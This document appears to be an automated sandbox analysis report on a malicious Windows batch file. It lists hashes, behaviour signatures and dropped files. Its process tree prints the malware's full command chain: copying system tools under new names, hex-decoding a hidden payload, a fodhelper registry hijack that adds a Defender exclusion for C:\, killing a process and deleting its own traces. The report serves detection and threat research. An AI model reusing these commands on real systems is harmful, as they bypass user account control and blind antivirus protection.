Overview

overview

10

Static

static

1

doc023561361500.cmd

windows7-x64

7

doc023561361500.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    13-05-2024 12:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    doc023561361500.cmd

  • Size

    3.5MB

  • MD5

    dd0e66d9764dda9819678f30922aa6bd

  • SHA1

    cc4937f70fc66f05c3c8d0df868a5bb82222a12c

  • SHA256

    a092e4a960900082c38c3b96ba17b62efa3d8b7a558ea9964478afa459fcc1a5

  • SHA512

    5279fbefb87e776e0c6cacd73610ff0ffada1f6493c01d39b5e44711cc37f1085bfa051f0e2235647f99a183b9c3bf1722dc3a0f760188b3c81b15c6de698206

  • SSDEEP

    49152:uKh6qKOnA/Xl5c25Qnvo9pYPTLBOEKSKhFVq1ZDNBcKKBP78Vp+D6LWg:R

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 17 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1216
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      2⤵
        PID:2104
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        2⤵
        • Executes dropped EXE
        PID:2020
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        2⤵
        • Executes dropped EXE
        PID:3068
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:1972
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2320
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
            3⤵
            • Executes dropped EXE
            PID:2656
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2740
          • C:\Windows\system32\extrac32.exe
            extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            3⤵
              PID:2728
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2632
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              3⤵
                PID:2788
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2536
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                3⤵
                  PID:2688
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2076
                • C:\Users\Public\xkn.exe
                  C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2552
                  • C:\Users\Public\alpha.exe
                    "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2544
                    • C:\Users\Public\ger.exe
                      C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                      5⤵
                      • Executes dropped EXE
                      • Modifies registry class
                      PID:2584
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:3064
                • C:\Users\Public\kn.exe
                  C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                  3⤵
                  • Executes dropped EXE
                  PID:2772
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:300
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM SystemSettings.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1792
              • C:\Users\Public\Libraries\Ping_c.pif
                C:\Users\Public\Libraries\Ping_c.pif
                2⤵
                • Executes dropped EXE
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1916
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                2⤵
                • Executes dropped EXE
                PID:2428
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                2⤵
                • Executes dropped EXE
                PID:2472
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                2⤵
                • Executes dropped EXE
                PID:2496
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:876
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:392
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:528
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:776
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:1056

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Public\Libraries\Ping_c.pif
              Filesize

              1.2MB

              MD5

              7ab12ae02c9531b7ffb6f4fbb24ee11d

              SHA1

              39eb62487ed993b200a0f015c10833643664b7a0

              SHA256

              96608d5d3810216c29d3e9ed53a0c004b7787da923f17922bf8af3405b85d90a

              SHA512

              eef676cc6928653d2b098ddfee4604dab46232fce3a20e32c7a2c505356c02d66b0cf045149bb4dd0e4b132635c639ddc006d482e502714ead7a7b64df3191c9

              Download Submit

            • C:\Users\Public\Ping_c.mp4
              Filesize

              2.4MB

              MD5

              4563cccfc27b4ee87597a7e6e73e7924

              SHA1

              c5eac5e97193ce539f8b387c906abb7fc9c9488e

              SHA256

              e0b66384d8a8da0fc7921d7bda9e6ea51abe4477009f82d27d4588c3444baea3

              SHA512

              080f27b767139105dcc80d038a55b50413a934f4390bdc2f0271acde17b3a1e2eb90dee765de433b067b7deda9752ba5b6ab4470c12eddd4d36534dbb4b5351a

              Download Submit

            • C:\Users\Public\alpha.exe
              Filesize

              337KB

              MD5

              5746bd7e255dd6a8afa06f7c42c1ba41

              SHA1

              0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

              SHA256

              db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

              SHA512

              3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

              Download Submit

            • C:\Users\Public\ger.exe
              Filesize

              73KB

              MD5

              9d0b3066fe3d1fd345e86bc7bcced9e4

              SHA1

              e05984a6671fcfecbc465e613d72d42bda35fd90

              SHA256

              4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

              SHA512

              d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

              Download Submit

            • \Users\Public\kn.exe
              Filesize

              1.1MB

              MD5

              ec1fd3050dbc40ec7e87ab99c7ca0b03

              SHA1

              ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

              SHA256

              1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

              SHA512

              4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

              Download Submit

            • \Users\Public\xkn.exe
              Filesize

              462KB

              MD5

              852d67a27e454bd389fa7f02a8cbe23f

              SHA1

              5330fedad485e0e4c23b2abe1075a1f984fde9fc

              SHA256

              a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

              SHA512

              327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

              Download Submit

            • memory/1916-75-0x0000000000400000-0x0000000000536000-memory.dmp

              Filesize

              1.2MB

              Download

            • memory/2552-43-0x000000001B550000-0x000000001B832000-memory.dmp

              Filesize

              2.9MB

              Download

            • memory/2552-44-0x0000000000380000-0x0000000000388000-memory.dmp

              Filesize

              32KB

              Download